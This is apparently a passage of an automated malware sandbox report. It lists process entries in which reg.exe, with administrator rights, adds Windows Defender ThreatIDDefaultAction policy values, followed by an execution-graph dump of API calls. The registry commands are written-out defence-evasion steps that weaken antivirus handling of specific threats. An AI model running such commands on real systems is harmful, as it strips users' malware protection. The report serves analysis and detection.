                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:54
                            Start time:16:11:58
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:15.8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:2.3%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:44
                              execution_graph 12792 411160 12795 413f9f 12792->12795 12796 411166 12795->12796 12797 413fcd 12795->12797 12798 414012 12797->12798 12799 413fd7 12797->12799 12800 414003 12798->12800 12803 41570a ctype 28 API calls 12798->12803 12812 41570a 12799->12812 12800->12796 12802 41406b RtlFreeHeap 12800->12802 12802->12796 12808 41401e ctype 12803->12808 12804 413fde ctype 12805 413ff8 12804->12805 12827 415ac8 12804->12827 12833 414009 12805->12833 12807 41404a 12840 414061 12807->12840 12808->12807 12836 41684f 12808->12836 12813 415760 EnterCriticalSection 12812->12813 12814 415722 12812->12814 12813->12804 12843 413e65 12814->12843 12818 41570a ctype 27 API calls 12820 415740 12818->12820 12819 415738 12819->12818 12821 415751 12820->12821 12822 415747 InitializeCriticalSection 12820->12822 12824 413f9f ctype 27 API calls 12821->12824 12823 415756 12822->12823 12852 41576b LeaveCriticalSection 12823->12852 12824->12823 12826 41575e 12826->12813 12829 415b06 12827->12829 12832 415dbc ctype 12827->12832 12828 415d02 VirtualFree 12830 415d66 12828->12830 12829->12828 12829->12832 12831 415d75 VirtualFree HeapFree 12830->12831 12830->12832 12831->12832 12832->12805 12936 41576b LeaveCriticalSection 12833->12936 12835 414010 12835->12800 12837 416892 12836->12837 12838 41687c 12836->12838 12837->12807 12838->12837 12937 416736 12838->12937 12946 41576b LeaveCriticalSection 12840->12946 12842 414068 12842->12800 12853 413e77 12843->12853 12846 414c0c 12847 414c15 12846->12847 12848 414c1a 12846->12848 12916 4177fd 12847->12916 12922 417836 12848->12922 12852->12826 12854 413e74 12853->12854 12856 413e7e ctype 12853->12856 12854->12819 12854->12846 12856->12854 12857 413ea3 12856->12857 12858 413ed0 12857->12858 12862 413f13 12857->12862 12859 41570a ctype 28 API calls 12858->12859 12863 413efe 12858->12863 12860 413ee6 12859->12860 12875 415df1 12860->12875 12861 413f82 RtlAllocateHeap 12872 413f05 12861->12872 12862->12863 12864 413f35 12862->12864 12863->12861 12863->12872 12866 41570a ctype 28 API calls 12864->12866 12868 413f3c 12866->12868 12884 416894 12868->12884 12871 413f4f 12891 413f69 12871->12891 12872->12856 12876 415e23 12875->12876 12877 415ec2 12876->12877 12879 413ef1 12876->12879 12894 4160fa 12876->12894 12877->12879 12901 4161ab 12877->12901 12881 413f0a 12879->12881 12905 41576b LeaveCriticalSection 12881->12905 12883 413f11 12883->12863 12885 4168a2 ctype 12884->12885 12886 41698e VirtualAlloc 12885->12886 12887 416a63 12885->12887 12890 41695f ctype 12885->12890 12886->12890 12906 41659c 12887->12906 12890->12871 12915 41576b LeaveCriticalSection 12891->12915 12893 413f5c 12893->12863 12893->12872 12895 41613d HeapAlloc 12894->12895 12896 41610d HeapReAlloc 12894->12896 12897 41618d 12895->12897 12899 416163 VirtualAlloc 12895->12899 12896->12897 12898 41612c 12896->12898 12897->12877 12898->12895 12899->12897 12900 41617d HeapFree 12899->12900 12900->12897 12902 4161bd VirtualAlloc 12901->12902 12904 416206 12902->12904 12904->12879 12905->12883 12907 4165b0 HeapAlloc 12906->12907 12908 4165a9 12906->12908 12909 4165cd VirtualAlloc 12907->12909 12910 416605 ctype 12907->12910 12908->12909 12911 4166c2 12909->12911 12912 4165ed VirtualAlloc 12909->12912 12910->12890 12911->12910 12913 4166ca HeapFree 12911->12913 12912->12910 12914 4166b4 VirtualFree 12912->12914 12913->12910 12914->12911 12915->12893 12917 417807 12916->12917 12918 417836 ctype 7 API calls 12917->12918 12921 417834 12917->12921 12919 41781e 12918->12919 12920 417836 ctype 7 API calls 12919->12920 12920->12921 12921->12848 12923 417849 12922->12923 12924 417889 12923->12924 12925 417960 ctype 12923->12925 12930 414c23 12923->12930 12926 417895 GetModuleFileNameA 12924->12926 12924->12930 12927 417973 GetStdHandle WriteFile 12925->12927 12928 4178ad ctype 12926->12928 12927->12930 12931 418320 12928->12931 12930->12819 12932 41832d LoadLibraryA 12931->12932 12933 41836f 12931->12933 12932->12933 12934 41833e GetProcAddress 12932->12934 12933->12930 12934->12933 12935 418355 GetProcAddress GetProcAddress 12934->12935 12935->12933 12936->12835 12940 416743 12937->12940 12938 4167f3 12938->12837 12939 416764 VirtualFree 12939->12940 12940->12938 12940->12939 12942 4166e0 VirtualFree 12940->12942 12943 4166fd 12942->12943 12944 41672d 12943->12944 12945 41670d HeapFree 12943->12945 12944->12940 12945->12940 12946->12842 12947 414b04 GetVersion 12978 4159f8 HeapCreate 12947->12978 12949 414b62 12950 414b67 12949->12950 12951 414b6f 12949->12951 13383 414c31 12950->13383 12990 4154bc 12951->12990 12954 414b74 12956 414b80 12954->12956 12957 414b78 12954->12957 13000 417641 12956->13000 12958 414c31 8 API calls 12957->12958 12960 414b7f 12958->12960 12960->12956 12961 414b8a GetCommandLineA 13014 41750f 12961->13014 12965 414ba4 13046 417209 12965->13046 12967 414ba9 12968 414bae GetStartupInfoA 12967->12968 13059 4171b1 12968->13059 12970 414bc0 GetModuleHandleA 13063 401014 12970->13063 12979 415a18 12978->12979 12980 415a4e 12978->12980 13397 4158b0 12979->13397 12980->12949 12983 415a34 12986 415a51 12983->12986 12988 41659c ctype 5 API calls 12983->12988 12984 415a27 13409 415a55 HeapAlloc 12984->13409 12986->12949 12987 415a31 12987->12986 12989 415a42 HeapDestroy 12987->12989 12988->12987 12989->12980 13510 4156e1 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 12990->13510 12992 4154c2 TlsAlloc 12993 4154d2 12992->12993 12994 41550c 12992->12994 12995 416efc 30 API calls 12993->12995 12994->12954 12996 4154db 12995->12996 12996->12994 12997 4154e3 TlsSetValue 12996->12997 12997->12994 12998 4154f4 12997->12998 12999 4154fa GetCurrentThreadId 12998->12999 12999->12954 13001 413e65 ctype 29 API calls 13000->13001 13002 417654 13001->13002 13003 417662 GetStartupInfoA 13002->13003 13004 414c0c ctype 7 API calls 13002->13004 13006 417781 13003->13006 13012 4176b0 13003->13012 13004->13003 13007 4177ac GetStdHandle 13006->13007 13008 4177ec SetHandleCount 13006->13008 13007->13006 13009 4177ba GetFileType 13007->13009 13008->12961 13009->13006 13010 417727 13010->13006 13013 417749 GetFileType 13010->13013 13011 413e65 ctype 29 API calls 13011->13012 13012->13006 13012->13010 13012->13011 13013->13010 13015 41752a GetEnvironmentStringsW 13014->13015 13016 41755d 13014->13016 13017 417532 13015->13017 13018 41753e GetEnvironmentStrings 13015->13018 13016->13017 13019 41754e 13016->13019 13021 417576 WideCharToMultiByte 13017->13021 13022 41756a GetEnvironmentStringsW 13017->13022 13018->13019 13020 414b9a 13018->13020 13019->13020 13024 4175f0 GetEnvironmentStrings 13019->13024 13025 4175fc 13019->13025 13037 4172c2 13020->13037 13026 4175aa 13021->13026 13027 4175dc FreeEnvironmentStringsW 13021->13027 13022->13020 13022->13021 13024->13020 13024->13025 13028 413e65 ctype 29 API calls 13025->13028 13029 413e65 ctype 29 API calls 13026->13029 13027->13020 13031 417617 13028->13031 13030 4175b0 13029->13030 13030->13027 13032 4175b9 WideCharToMultiByte 13030->13032 13033 41762d FreeEnvironmentStringsA 13031->13033 13034 4175d3 13032->13034 13035 4175ca 13032->13035 13033->13020 13034->13027 13036 413f9f ctype 29 API calls 13035->13036 13036->13034 13038 4172d4 13037->13038 13039 4172d9 GetModuleFileNameA 13037->13039 13511 418212 13038->13511 13041 4172fc 13039->13041 13042 413e65 ctype 29 API calls 13041->13042 13043 41731d 13042->13043 13044 41732d 13043->13044 13045 414c0c ctype 7 API calls 13043->13045 13044->12965 13045->13044 13047 417216 13046->13047 13050 41721b ctype 13046->13050 13048 418212 48 API calls 13047->13048 13048->13050 13049 413e65 ctype 29 API calls 13051 417248 13049->13051 13050->13049 13052 414c0c ctype 7 API calls 13051->13052 13058 41725c ctype 13051->13058 13052->13058 13053 41729f 13054 413f9f ctype 29 API calls 13053->13054 13055 4172ab 13054->13055 13055->12967 13056 413e65 ctype 29 API calls 13056->13058 13057 414c0c ctype 7 API calls 13057->13058 13058->13053 13058->13056 13058->13057 13060 4171ba 13059->13060 13062 4171bf 13059->13062 13061 418212 48 API calls 13060->13061 13061->13062 13062->12970 13540 401a51 GetVersionExA 13063->13540 13068 402170 30 API calls 13069 401067 13068->13069 13070 402170 30 API calls 13069->13070 13071 401079 13070->13071 13072 402170 30 API calls 13071->13072 13073 40108b GetCommandLineW 13072->13073 13548 401c80 13073->13548 13080 402170 30 API calls 13081 4010c7 13080->13081 13565 4045e2 13081->13565 13088 401c80 30 API calls 13089 4010f5 13088->13089 13597 401e3a 13089->13597 13094 403a9c ctype 29 API calls 13095 401118 13094->13095 13096 403a9c ctype 29 API calls 13095->13096 13097 401120 13096->13097 13098 40115a 13097->13098 13714 401e19 13097->13714 13604 40243e 13098->13604 13105 401182 13107 401186 13105->13107 13108 40119f 13105->13108 13106 401141 13109 403a9c ctype 29 API calls 13106->13109 13110 401197 13107->13110 13721 411093 MessageBoxW 13107->13721 13111 401c80 30 API calls 13108->13111 13112 401149 13109->13112 13117 403a9c ctype 29 API calls 13110->13117 13114 4011af 13111->13114 13115 40235e 30 API calls 13112->13115 13116 402170 30 API calls 13114->13116 13118 401152 13115->13118 13125 4011c1 13116->13125 13119 4019cc 13117->13119 13120 402323 30 API calls 13118->13120 13122 403a9c ctype 29 API calls 13119->13122 13120->13098 13121 4014b1 13617 401ecd 13121->13617 13123 4019d4 13122->13123 13126 403a9c ctype 29 API calls 13123->13126 13125->13121 13722 403d5a 13125->13722 13130 4019dc 13126->13130 13133 403a9c ctype 29 API calls 13130->13133 13134 4019e4 13133->13134 13140 403a9c ctype 29 API calls 13134->13140 13135 4014f0 13625 403a76 13135->13625 13136 4014d7 13141 4014e8 13136->13141 13766 411093 MessageBoxW 13136->13766 13137 401212 13142 401c80 30 API calls 13137->13142 13138 4011f9 13139 40120a 13138->13139 13749 411093 MessageBoxW 13138->13749 13757 4042d6 13139->13757 13145 4019ec 13140->13145 13148 401a2d 36 API calls 13141->13148 13147 40121f 13142->13147 13149 403a9c ctype 29 API calls 13145->13149 13750 404073 13147->13750 13152 4019a3 13148->13152 13334 401395 13149->13334 13155 403a9c ctype 29 API calls 13152->13155 13161 4019ae 13155->13161 13156 403a9c ctype 29 API calls 13162 401239 13156->13162 13157 4014f7 13630 408107 13157->13630 13159 40134f 13163 403a9c ctype 29 API calls 13159->13163 13165 403a9c ctype 29 API calls 13161->13165 13166 401c80 30 API calls 13162->13166 13167 401357 13163->13167 13170 4019b6 13165->13170 13171 401248 13166->13171 13172 403a9c ctype 29 API calls 13167->13172 13168 40152a 13767 411093 MessageBoxW 13168->13767 13169 40153b 13640 401a03 13169->13640 13174 403a9c ctype 29 API calls 13170->13174 13176 404073 30 API calls 13171->13176 13177 401362 13172->13177 13174->13110 13179 40125a 13176->13179 13180 403a9c ctype 29 API calls 13177->13180 13182 403a9c ctype 29 API calls 13179->13182 13183 40136a 13180->13183 13181 402170 30 API calls 13184 401562 13181->13184 13185 401262 13182->13185 13187 403a9c ctype 29 API calls 13183->13187 13643 402f15 13184->13643 13186 401c80 30 API calls 13185->13186 13189 401271 13186->13189 13190 401372 13187->13190 13192 404073 30 API calls 13189->13192 13193 403a9c ctype 29 API calls 13190->13193 13197 401286 13192->13197 13198 40137a 13193->13198 13194 401585 13199 4015f0 13194->13199 13203 4015b6 13194->13203 13768 40602f 13194->13768 13195 4015f9 13196 403a9c ctype 29 API calls 13195->13196 13200 401601 13196->13200 13201 403a9c ctype 29 API calls 13197->13201 13202 403a9c ctype 29 API calls 13198->13202 13207 403a9c ctype 29 API calls 13199->13207 13205 401ecd 30 API calls 13200->13205 13206 40128e 13201->13206 13208 401382 13202->13208 13203->13199 13221 40602f 33 API calls 13203->13221 13210 40160a 13205->13210 13211 403b4f ctype 5 API calls 13206->13211 13212 4018bc 13207->13212 13213 403a9c ctype 29 API calls 13208->13213 13685 405033 13210->13685 13216 40129f 13211->13216 13217 403a9c ctype 29 API calls 13212->13217 13218 40138a 13213->13218 13214 401d7a 30 API calls 13219 4015ab 13214->13219 13227 401c80 30 API calls 13216->13227 13222 4018c7 13217->13222 13223 403a9c ctype 29 API calls 13218->13223 13224 403a9c ctype 29 API calls 13219->13224 13220 401612 SetCurrentDirectoryA 13225 401651 13220->13225 13226 401624 SetCurrentDirectoryA 13220->13226 13228 4015d6 MessageBoxW 13221->13228 13799 401a2d 13222->13799 13223->13334 13224->13203 13229 40165a 13225->13229 13230 40172c 13225->13230 13232 403a9c ctype 29 API calls 13226->13232 13233 4012b6 13227->13233 13234 403a9c ctype 29 API calls 13228->13234 13235 401a18 31 API calls 13229->13235 13237 401787 13230->13237 13775 401d1b 13230->13775 13238 401631 13232->13238 13249 403a9c ctype 29 API calls 13233->13249 13234->13199 13239 401665 13235->13239 13236 4018de 13240 403a9c ctype 29 API calls 13236->13240 13690 401ce1 13237->13690 13243 403a9c ctype 29 API calls 13238->13243 13244 401693 13239->13244 13245 40169f 13239->13245 13246 4018e9 13240->13246 13243->13141 13771 401de3 13244->13771 13252 401a18 31 API calls 13245->13252 13251 403a9c ctype 29 API calls 13246->13251 13255 4012ce 13249->13255 13257 4018f1 13251->13257 13258 4016aa ShellExecuteExA 13252->13258 13254 401a18 31 API calls 13260 40174c 13254->13260 13256 4012eb 13255->13256 13261 401d7a 30 API calls 13255->13261 13262 40139d 13256->13262 13270 4012fd MessageBoxW 13256->13270 13263 403a9c ctype 29 API calls 13257->13263 13264 4016e6 13258->13264 13265 40170d 13258->13265 13779 40587c 13260->13779 13261->13256 13269 401c80 30 API calls 13262->13269 13271 4018fc 13263->13271 13272 4016f7 13264->13272 13774 411093 MessageBoxW 13264->13774 13268 403a9c ctype 29 API calls 13265->13268 13266 401c80 30 API calls 13273 4017ab 13266->13273 13275 40171e 13268->13275 13276 4013aa 13269->13276 13270->13262 13277 401315 13270->13277 13278 403a9c ctype 29 API calls 13271->13278 13281 403a9c ctype 29 API calls 13272->13281 13697 401e56 13273->13697 13283 403a9c ctype 29 API calls 13275->13283 13284 404073 30 API calls 13276->13284 13285 403a9c ctype 29 API calls 13277->13285 13286 401904 13278->13286 13288 4016ff 13281->13288 13282 403a9c ctype 29 API calls 13289 401767 13282->13289 13290 401726 13283->13290 13291 4013bf 13284->13291 13292 401320 13285->13292 13293 403a9c ctype 29 API calls 13286->13293 13295 403a9c ctype 29 API calls 13288->13295 13289->13237 13296 40176d 13289->13296 13298 40195a 13290->13298 13299 401d7a 30 API calls 13291->13299 13300 403a9c ctype 29 API calls 13292->13300 13301 40190c 13293->13301 13294 403a9c ctype 29 API calls 13302 4017c3 13294->13302 13303 401707 13295->13303 13297 4018af SetCurrentDirectoryA 13296->13297 13787 411093 MessageBoxW 13296->13787 13297->13199 13306 401960 WaitForSingleObject CloseHandle 13298->13306 13307 401974 SetCurrentDirectoryA 13298->13307 13308 4013c8 13299->13308 13309 401328 13300->13309 13310 403a9c ctype 29 API calls 13301->13310 13311 403a9c ctype 29 API calls 13302->13311 13304 401782 13303->13304 13304->13297 13306->13307 13313 403a9c ctype 29 API calls 13307->13313 13312 403a9c ctype 29 API calls 13308->13312 13314 403a9c ctype 29 API calls 13309->13314 13315 401914 13310->13315 13316 4017cb 13311->13316 13318 4013d3 13312->13318 13319 401981 13313->13319 13314->13139 13320 403a9c ctype 29 API calls 13315->13320 13317 401c80 30 API calls 13316->13317 13321 4017da 13317->13321 13322 403a9c ctype 29 API calls 13318->13322 13323 403a9c ctype 29 API calls 13319->13323 13324 40191c 13320->13324 13326 401e56 30 API calls 13321->13326 13327 4013db 13322->13327 13323->13141 13325 403a9c ctype 29 API calls 13324->13325 13328 401924 13325->13328 13329 4017ed 13326->13329 13330 401c80 30 API calls 13327->13330 13331 403a9c ctype 29 API calls 13328->13331 13332 403a9c ctype 29 API calls 13329->13332 13333 4013ea 13330->13333 13331->13334 13335 4017f5 13332->13335 13336 404073 30 API calls 13333->13336 13389 416c96 13334->13389 13337 401811 13335->13337 13788 401db8 13335->13788 13338 4013ff 13336->13338 13701 402634 13337->13701 13339 401d7a 30 API calls 13338->13339 13342 401408 13339->13342 13345 403a9c ctype 29 API calls 13342->13345 13348 401413 13345->13348 13346 401de3 30 API calls 13346->13337 13350 403a9c ctype 29 API calls 13348->13350 13353 40141b 13350->13353 13356 401c80 30 API calls 13353->13356 13359 40142a 13356->13359 13362 404073 30 API calls 13359->13362 13363 401443 13362->13363 13364 402634 30 API calls 13363->13364 13365 401450 13364->13365 13366 401d7a 30 API calls 13365->13366 13367 401459 13366->13367 13368 403a9c ctype 29 API calls 13367->13368 13369 401464 13368->13369 13370 403a9c ctype 29 API calls 13369->13370 13371 40146f 13370->13371 13372 403a9c ctype 29 API calls 13371->13372 13373 401477 13372->13373 13374 403a9c ctype 29 API calls 13373->13374 13375 401482 13374->13375 13376 403a9c ctype 29 API calls 13375->13376 13377 40148a 13376->13377 13378 403a9c ctype 29 API calls 13377->13378 13379 401492 13378->13379 13380 4042d6 ctype 34 API calls 13379->13380 13381 4014a6 13380->13381 13382 4042ad ctype 34 API calls 13381->13382 13382->13121 13384 414c3a 13383->13384 13385 414c3f 13383->13385 13386 4177fd ctype 7 API calls 13384->13386 13387 417836 ctype 7 API calls 13385->13387 13386->13385 13388 414c48 ExitProcess 13387->13388 16057 416cb8 13389->16057 13392 417039 13393 415523 35 API calls 13392->13393 13394 417044 13393->13394 13395 41716a UnhandledExceptionFilter 13394->13395 13396 414bfe 13394->13396 13395->13396 13411 413cc0 13397->13411 13400 4158f3 GetEnvironmentVariableA 13404 415912 13400->13404 13408 4159d0 13400->13408 13401 4158d9 13401->13400 13402 4158eb 13401->13402 13402->12983 13402->12984 13405 415957 GetModuleFileNameA 13404->13405 13406 41594f 13404->13406 13405->13406 13406->13408 13413 4179f0 13406->13413 13408->13402 13416 415883 GetModuleHandleA 13408->13416 13410 415a71 13409->13410 13410->12987 13412 413ccc GetVersionExA 13411->13412 13412->13400 13412->13401 13418 417a07 13413->13418 13417 41589a 13416->13417 13417->13402 13420 417a1f 13418->13420 13422 417a4f 13420->13422 13427 4187a8 13420->13427 13421 4187a8 6 API calls 13421->13422 13422->13421 13423 417b78 13422->13423 13426 417a03 13422->13426 13431 41866d 13422->13431 13423->13426 13442 416eea 13423->13442 13426->13408 13428 4187c6 13427->13428 13429 4187ba 13427->13429 13445 418a6c 13428->13445 13429->13420 13432 418678 13431->13432 13433 41868b InterlockedIncrement 13431->13433 13432->13422 13434 4186b1 13433->13434 13435 4186a7 InterlockedDecrement 13433->13435 13457 4186dc 13434->13457 13436 41570a ctype 29 API calls 13435->13436 13436->13434 13439 4186d1 InterlockedDecrement 13439->13432 13440 4186c7 13463 41576b LeaveCriticalSection 13440->13463 13482 415523 GetLastError TlsGetValue 13442->13482 13444 416eef 13444->13426 13446 418ab5 13445->13446 13447 418a9d GetStringTypeW 13445->13447 13449 418ae0 GetStringTypeA 13446->13449 13450 418b04 13446->13450 13447->13446 13448 418ab9 GetStringTypeA 13447->13448 13448->13446 13451 418ba1 13448->13451 13449->13451 13450->13451 13453 418b1a MultiByteToWideChar 13450->13453 13451->13429 13453->13451 13454 418b3e ctype 13453->13454 13454->13451 13455 418b78 MultiByteToWideChar 13454->13455 13455->13451 13456 418b91 GetStringTypeW 13455->13456 13456->13451 13458 4186be 13457->13458 13459 418707 13457->13459 13458->13439 13458->13440 13460 418723 13459->13460 13461 4187a8 6 API calls 13459->13461 13460->13458 13464 41881d 13460->13464 13461->13460 13463->13432 13465 418869 13464->13465 13466 41884d LCMapStringW 13464->13466 13468 4188b2 LCMapStringA 13465->13468 13470 4188cf 13465->13470 13466->13465 13467 418871 LCMapStringA 13466->13467 13467->13465 13476 4189ab 13467->13476 13468->13476 13469 4188e5 MultiByteToWideChar 13471 41890f 13469->13471 13469->13476 13470->13469 13470->13476 13472 418945 MultiByteToWideChar 13471->13472 13471->13476 13473 41895e LCMapStringW 13472->13473 13472->13476 13474 418979 13473->13474 13473->13476 13475 41897f 13474->13475 13478 4189bf 13474->13478 13475->13476 13477 41898d LCMapStringW 13475->13477 13476->13458 13477->13476 13478->13476 13479 4189f7 LCMapStringW 13478->13479 13479->13476 13480 418a0f WideCharToMultiByte 13479->13480 13480->13476 13483 41553f 13482->13483 13484 41557e SetLastError 13482->13484 13493 416efc 13483->13493 13484->13444 13487 415550 TlsSetValue 13488 415576 13487->13488 13489 415561 13487->13489 13490 414c0c ctype 7 API calls 13488->13490 13492 415567 GetCurrentThreadId 13489->13492 13491 41557d 13490->13491 13491->13484 13492->13484 13501 416f31 ctype 13493->13501 13494 415548 13494->13487 13494->13488 13495 416fe9 HeapAlloc 13495->13501 13496 41570a 29 API calls ctype 13496->13501 13497 415df1 ctype 5 API calls 13497->13501 13498 416894 ctype 6 API calls 13498->13501 13501->13494 13501->13495 13501->13496 13501->13497 13501->13498 13502 416f95 13501->13502 13505 41701e 13501->13505 13508 41576b LeaveCriticalSection 13502->13508 13504 416f9c 13504->13501 13509 41576b LeaveCriticalSection 13505->13509 13507 417025 13507->13501 13508->13504 13509->13507 13510->12992 13512 41821b 13511->13512 13513 418222 13511->13513 13515 417e3a 13512->13515 13513->13039 13516 41570a ctype 29 API calls 13515->13516 13517 417e4a 13516->13517 13526 417fe7 13517->13526 13519 417e61 13539 41576b LeaveCriticalSection 13519->13539 13522 417fdf 13522->13513 13524 417e86 GetCPInfo 13525 417e9c 13524->13525 13525->13519 13531 41808d GetCPInfo 13525->13531 13527 418007 13526->13527 13528 417ff7 GetOEMCP 13526->13528 13529 41800c GetACP 13527->13529 13530 417e52 13527->13530 13528->13527 13529->13530 13530->13519 13530->13524 13530->13525 13532 418178 13531->13532 13536 4180b0 13531->13536 13532->13519 13533 418a6c 6 API calls 13534 41812c 13533->13534 13535 41881d 9 API calls 13534->13535 13537 418150 13535->13537 13536->13533 13538 41881d 9 API calls 13537->13538 13538->13532 13539->13522 13541 40102d 13540->13541 13542 402170 13541->13542 13543 402180 13542->13543 13544 401055 13542->13544 13545 403a76 30 API calls 13543->13545 13544->13068 13546 40218a 13545->13546 13546->13544 13547 403a9c ctype 29 API calls 13546->13547 13547->13544 13549 401c9e 13548->13549 13550 402170 30 API calls 13549->13550 13551 40109a 13550->13551 13552 4038ee 13551->13552 13557 4038f8 __EH_prolog 13552->13557 13553 4010ac 13562 403a9c 13553->13562 13554 40396d 13556 401e19 30 API calls 13554->13556 13555 401db8 30 API calls 13555->13557 13558 40397c 13556->13558 13557->13553 13557->13554 13557->13555 13559 401d7a 30 API calls 13558->13559 13560 403989 13559->13560 13561 403a9c ctype 29 API calls 13560->13561 13561->13553 13563 413f9f ctype 29 API calls 13562->13563 13564 4010b4 13563->13564 13564->13080 13566 4045ec __EH_prolog 13565->13566 13567 40460b GetModuleFileNameW 13566->13567 13568 40463f 13566->13568 13569 404625 13567->13569 13575 404637 13567->13575 13570 40243e 30 API calls 13568->13570 13573 401d1b 30 API calls 13569->13573 13569->13575 13572 404652 13570->13572 13571 4010d5 13585 40235e 13571->13585 13804 404598 GetModuleFileNameA 13572->13804 13573->13575 13575->13571 13577 40468e 13580 403a9c ctype 29 API calls 13577->13580 13578 404663 AreFileApisANSI 13808 403b9c 13578->13808 13580->13575 13582 401d7a 30 API calls 13583 404686 13582->13583 13584 403a9c ctype 29 API calls 13583->13584 13584->13577 13586 402368 __EH_prolog 13585->13586 13826 4025a3 13586->13826 13588 402377 13589 403a9c ctype 29 API calls 13588->13589 13590 4010dd 13589->13590 13591 402323 13590->13591 13592 40232d __EH_prolog 13591->13592 13593 4025a3 30 API calls 13592->13593 13594 40233c 13593->13594 13595 403a9c ctype 29 API calls 13594->13595 13596 4010e5 13595->13596 13596->13088 13840 40220e 13597->13840 13600 403b4f 13601 403b58 13600->13601 13602 403aa7 5 API calls ctype 13601->13602 13603 40110e 13601->13603 13602->13601 13603->13094 13605 40116c 13604->13605 13606 40244e 13604->13606 13610 401af4 13605->13610 13607 403a76 30 API calls 13606->13607 13608 402455 13607->13608 13608->13605 13609 403a9c ctype 29 API calls 13608->13609 13609->13605 13611 401afe __EH_prolog 13610->13611 13853 405b6d 13611->13853 13613 401b30 13613->13105 13614 401b2c ctype 13614->13613 13614->13614 13856 405bca 13614->13856 13860 401ee5 13614->13860 13618 40243e 30 API calls 13617->13618 13619 4014c2 13618->13619 13620 405298 13619->13620 13621 401a2d 36 API calls 13620->13621 13622 4052a0 13621->13622 13924 4051c8 13622->13924 13626 413e65 ctype 29 API calls 13625->13626 13627 403a81 13626->13627 13628 403a9a 13627->13628 14026 413d3d RaiseException 13627->14026 13628->13157 13631 408111 __EH_prolog 13630->13631 13632 4042d6 ctype 34 API calls 13631->13632 13634 408120 13632->13634 13635 401d1b 30 API calls 13634->13635 13639 401526 13634->13639 14027 4081a8 13634->14027 14030 407f06 13634->14030 14057 408248 13634->14057 14065 402092 13634->14065 13635->13634 13639->13168 13639->13169 13641 403b9c 31 API calls 13640->13641 13642 40154c 13641->13642 13642->13181 13644 402f1f __EH_prolog 13643->13644 14143 403376 13644->14143 13647 401d7a 30 API calls 13648 402f53 13647->13648 13649 401d7a 30 API calls 13648->13649 13650 402f61 13649->13650 13651 403a76 30 API calls 13650->13651 13652 402f6b 13651->13652 13654 402f7e 13652->13654 14209 4034e3 13652->14209 13655 403037 13654->13655 13656 402f9a 13654->13656 14151 403113 13655->14151 14223 413220 13656->14223 13659 402fc2 13662 402fd5 13659->13662 13663 402fc8 13659->13663 13660 403042 13661 401d7a 30 API calls 13660->13661 13668 403050 13661->13668 13665 402170 30 API calls 13662->13665 14229 4131e0 13663->14229 13666 402fe8 13665->13666 13670 40602f 33 API calls 13666->13670 13667 403065 14199 40348a 13667->14199 13668->13667 13671 401d7a 30 API calls 13668->13671 13672 402ff7 13670->13672 13671->13667 13674 401d7a 30 API calls 13672->13674 13676 403004 13674->13676 13677 403a9c ctype 29 API calls 13676->13677 13678 403010 13677->13678 14233 40309d 13678->14233 13680 403021 13681 403a9c ctype 29 API calls 13680->13681 13682 403029 13681->13682 13683 4131e0 ctype 2 API calls 13682->13683 13684 403035 13683->13684 13684->13660 13686 405041 13685->13686 13687 405047 GetCurrentDirectoryA 13685->13687 13688 40243e 30 API calls 13686->13688 13689 405059 13687->13689 13688->13687 13689->13220 13691 402170 30 API calls 13690->13691 13692 401796 13691->13692 13693 405d0b 13692->13693 13694 40179e 13693->13694 13695 405d16 13693->13695 13694->13266 13695->13694 13696 401db8 30 API calls 13695->13696 13696->13694 13698 4017bb 13697->13698 13699 401e69 13697->13699 13698->13294 13699->13698 15872 402399 13699->15872 13702 40263e __EH_prolog 13701->13702 13703 401ce1 30 API calls 13702->13703 13704 402651 13703->13704 13705 401de3 30 API calls 13704->13705 13706 402660 13705->13706 13707 401ce1 30 API calls 13706->13707 13708 40266b 13707->13708 13715 40220e 30 API calls 13714->13715 13716 401138 13715->13716 13717 401d7a 13716->13717 13718 401d98 13717->13718 13719 401d86 13717->13719 13718->13106 13720 402170 30 API calls 13719->13720 13720->13718 13721->13110 13723 403d64 __EH_prolog 13722->13723 13724 4042d6 ctype 34 API calls 13723->13724 13737 403d75 13724->13737 13725 4011f5 13725->13137 13725->13138 13726 402ee1 30 API calls 13726->13737 13728 403eec 13729 403a9c ctype 29 API calls 13728->13729 13730 403ef4 13729->13730 13731 403a9c ctype 29 API calls 13730->13731 13732 403efc 13731->13732 13733 403a9c ctype 29 API calls 13732->13733 13733->13725 13734 40243e 30 API calls 13734->13737 13735 403f09 13736 403a9c ctype 29 API calls 13735->13736 13738 403f11 13736->13738 13737->13725 13737->13726 13737->13728 13737->13734 13737->13735 13739 40411f 30 API calls 13737->13739 13742 401ee5 30 API calls 13737->13742 13747 403a9c 29 API calls ctype 13737->13747 15880 403f3c 13737->15880 15890 4040be 13737->15890 15900 40213f 13737->15900 13740 403a9c ctype 29 API calls 13738->13740 13739->13737 13741 403f19 13740->13741 13744 403a9c ctype 29 API calls 13741->13744 13742->13737 13745 403f21 13744->13745 13746 403a9c ctype 29 API calls 13745->13746 13746->13725 13747->13737 13749->13139 13751 40408b 13750->13751 13752 4040a5 13751->13752 13753 40408f 13751->13753 13755 401ce1 30 API calls 13752->13755 13754 402170 30 API calls 13753->13754 13756 401231 13754->13756 13755->13756 13756->13156 13758 4042eb ctype 34 API calls 13757->13758 13759 401344 13758->13759 13760 4042ad 13759->13760 13761 4042b8 13760->13761 13762 4042d6 ctype 34 API calls 13761->13762 13763 4042c0 13762->13763 13764 403a9c ctype 29 API calls 13763->13764 